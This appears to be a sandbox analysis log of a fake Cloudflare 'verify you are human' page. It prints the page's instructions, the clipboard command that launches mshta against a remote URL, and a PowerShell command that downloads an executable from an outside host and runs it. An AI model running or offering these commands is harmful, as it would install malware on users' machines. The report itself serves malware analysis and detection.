Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\ProgramData\Captcha.exe "C:\ProgramData\Captcha.exe"
Source: C:\ProgramData\Captcha.exe	Process created: C:\ProgramData\Captcha.exe none
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 --field-trial-handle=2252,i,18259865782207701125,4781670294957568771,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\ProgramData\Captcha.exe "C:\ProgramData\Captcha.exe"	Jump to behavior
Source: C:\ProgramData\Captcha.exe	Process created: C:\ProgramData\Captcha.exe none	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\Captcha.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\ProgramData\Captcha.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\ProgramData\Captcha.exe	Section loaded: apphelp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'"			Jump to behavior

Source: Captcha.exe.15.dr

Static PE information: section name: .symtab

Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CCD955 push E8000010h; retn 004Bh	17_3_01CCD95A
Source: C:\ProgramData\Captcha.exe	Code function: 17_2_00F93126 pushfd ; ret	17_2_00F93127
Source: C:\ProgramData\Captcha.exe	Code function: 17_2_00F8DD26 pushfd ; ret	17_2_00F8DD27

Persistence and Installation Behavior

Detect drive by download via clipboard copy & paste

Source: screenshot	OCR Text: x e about:blank X Just a moment.. C rea.grupolalegion.ec/p.php/l rea.grupolalegion.ec Verify' seconds. Complete these Verification steps To better prove you are nat a rabat, please: 1, Press & hold the Windows Key g + R 2. In the verification window, press Ctrl + V 3, Press Enter on the keyboard to finish curity of your connection before rea.gr Yau fully agree: I am not a robot - Cloudflare Verification ID: 89ad7f proce Perform the steps above to finish verification VERIFY Ray Performance & security by Claudflare Cloudflare 07:08 ENG p Type here to search 07/03/2025
Source: Chrome DOM: 1.4	OCR Text: rea.grupolalegion.ec Verify tew seconds. Complete these Verification steps To better prove you are nat a rabat, please: 1 . Press & hold the Windows Key + R 2. In the verification window, press Ctrl + V 3, Press Enter on the keyboard to finish curity of your connection before rea.gr Yau fully agree: I am not a robot - Cloudflare Verification 10: 89ad7f proce Perform the steps above to finish verification VERIFY Ray 10: Performance & security by Cloudflare Claudflare

HTML page adds supicious text to clipboard

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Clipboard modification: mshta https://rea.grupolalegion.ec/p.php

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\Captcha.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\Captcha.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
